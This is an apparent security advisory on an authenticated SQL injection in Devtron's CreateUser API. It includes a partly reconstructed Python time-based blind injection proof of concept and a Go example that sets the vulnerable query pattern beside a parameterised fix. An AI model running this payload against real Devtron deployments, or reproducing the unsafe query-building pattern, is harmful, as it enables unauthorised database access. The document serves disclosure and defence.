API Security Blog

Devtron has SQL Injection in CreateUser API

Summary

An authenticated user with only minimum permissions can exploit a SQL injection to execute attacker-controlled SQL queries via the CreateUser API (/orchestrator/user).

Details

The affected API is CreateUser (/orchestrator/user). The handler that reads user input is:

https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo parameter (line 104) is fully controlled by the caller. The injection happens in:

https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query built at line 1038 incorporates those user-controlled values directly, so the caller can craft and execute a malicious SQL statement. The caller must be authenticated, but only minimum permissions are required.

PoC

The following script demonstrates a time-based blind SQL injection through the accessType field of a roleFilters entry, used to retrieve the database name. The string literal is closed with a single quote, the attacker's statement is appended, and the remainder of the original query is commented out with --. The original post is cut off after the request is sent; the last lines of the function below are an assumed minimal completion that returns the measured request time (a pg_sleep() in the injected query makes a true condition visible as a delay).

```python
import requests
import time
import string
import argparse


def blind(ip, token, query):
    url = f"https://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    # Close the string literal, inject the statement, comment out the rest of the query
    payload = f"'; {query} --"
    data = {
        "id": 111,
        "email_id": "abcd123@126.com",
        "superAdmin": False,
        "roleFilters": [
            {"team": "", "environment": "", "action": "", "entity": entity, "accessType": payload}
        ],
    }
    # "EntityName": "test", "AccessType": "test", "Cluster": "", "NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json=data)
    # The original PoC is truncated here (the extraction loop using string/argparse is not on the page);
    # assumed completion: return the elapsed time so the caller can detect an injected sleep
    return time.time() - start
```
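To make the bug class concrete, here is an added Go example (not Devtron's code) that puts the vulnerable pattern beside its fix: one function splices the roleFilters fields into SQL text with fmt.Sprintf, the other passes them as parameters, and an allowlist validator rejects the PoC payload before any query is built. The RoleFilter struct, the roles table and its column names, and the character-class rule in the validator are all assumptions made for illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// RoleFilter mirrors one roleFilters entry from the CreateUser request body in
// the PoC above. Field names follow that JSON; the struct itself is assumed.
type RoleFilter struct {
	Team        string
	Environment string
	Action      string
	Entity      string
	AccessType  string
}

// BuildRoleQueryUnsafe reproduces the bug class: request-controlled strings are
// spliced into SQL text. Table and column names are assumed for illustration;
// this is not Devtron's actual statement.
func BuildRoleQueryUnsafe(f RoleFilter) string {
	return fmt.Sprintf(
		"SELECT id FROM roles WHERE entity = '%s' AND access_type = '%s';",
		f.Entity, f.AccessType)
}

// BuildRoleQuerySafe returns a parameterised statement and its arguments. The
// driver ships the values separately, so a quote or semicolon inside a value
// can neither end the literal nor start a second statement.
func BuildRoleQuerySafe(f RoleFilter) (string, []interface{}) {
	return "SELECT id FROM roles WHERE entity = $1 AND access_type = $2;",
		[]interface{}{f.Entity, f.AccessType}
}

// identRe accepts the kind of token these fields legitimately hold
// (e.g. "chart-group", "devtroncd"); empty is allowed because the PoC sends "".
var identRe = regexp.MustCompile(`^[A-Za-z0-9_-]*$`)

// ValidateRoleFilter is a defence-in-depth allowlist applied before any query
// is built. Checking against the project's real enumerations would be stricter;
// the character-class rule here is an assumption.
func ValidateRoleFilter(f RoleFilter) error {
	fields := []struct{ name, value string }{
		{"team", f.Team}, {"environment", f.Environment}, {"action", f.Action},
		{"entity", f.Entity}, {"accessType", f.AccessType},
	}
	for _, fl := range fields {
		if !identRe.MatchString(fl.value) {
			return fmt.Errorf("roleFilter.%s: disallowed characters in %q", fl.name, fl.value)
		}
	}
	return nil
}

// StatementCount is a crude check used only to make the effect visible: it
// counts non-empty ';'-separated pieces of the rendered SQL.
func StatementCount(sql string) int {
	n := 0
	for _, part := range strings.Split(sql, ";") {
		if strings.TrimSpace(part) != "" {
			n++
		}
	}
	return n
}

func main() {
	// Constructed input: the PoC's payload shape carrying a 5 s sleep.
	hostile := RoleFilter{Entity: "chart-group", AccessType: "'; SELECT pg_sleep(5) --"}
	fmt.Println(BuildRoleQueryUnsafe(hostile)) // two statements, pg_sleep runs
	q, args := BuildRoleQuerySafe(hostile)
	fmt.Println(q, args) // one statement, payload stays an opaque value
	fmt.Println(ValidateRoleFilter(hostile)) // rejected before any SQL is built
}
```

The parameterised form is the real fix; the validator only narrows what reaches the repository layer and does not replace it.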
